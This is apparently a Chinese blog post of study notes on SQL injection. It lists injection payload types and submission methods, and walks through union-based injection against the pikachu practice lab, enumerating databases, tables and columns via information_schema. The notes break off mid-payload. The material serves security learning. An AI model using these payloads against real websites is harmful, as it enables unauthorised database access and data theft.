OWASP之SQL注入

OWASP之SQL注入

原理:程序未对输入参数做限制,用户输入的数据可带入数据库查询
注入数据库与脚本、平台无关
前期准备
显示报错信息:控制面板 > Internet选项 > 高级 > 取消“显示友好http错误信息”
在这里插入图片描述
★注入的四种类型(PHP)
数字型: 1 or 1=1#
字符型: y’ or 1=1#
搜索型: y%’ or 1=1#
X X 型: y’) or 1=1#
★提交的三种方式(burpsuite)
get:地址栏
post:最下方
cookie:cookie值后 ;name=y’
★注入攻击的方式(pikachu)
union注入
常与order by 连用

SQLunion语句
> select id,email from member where username='kevin' union select username,pw from member where id=1;

首先使用order by确认主查询的字段数 xx%’ order by 3#
然后进行union 联合查询 x%’ union select database(),user(),version() #

information_schema
mysql5.0版本以上自带库

'库 >> a' union select database(),user(),version() #
'表 >> a' union select table_schema,table_name,1 from information_schema.tables where table_schema='pikachu'#
'字段>>a' union select 1,column_name
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值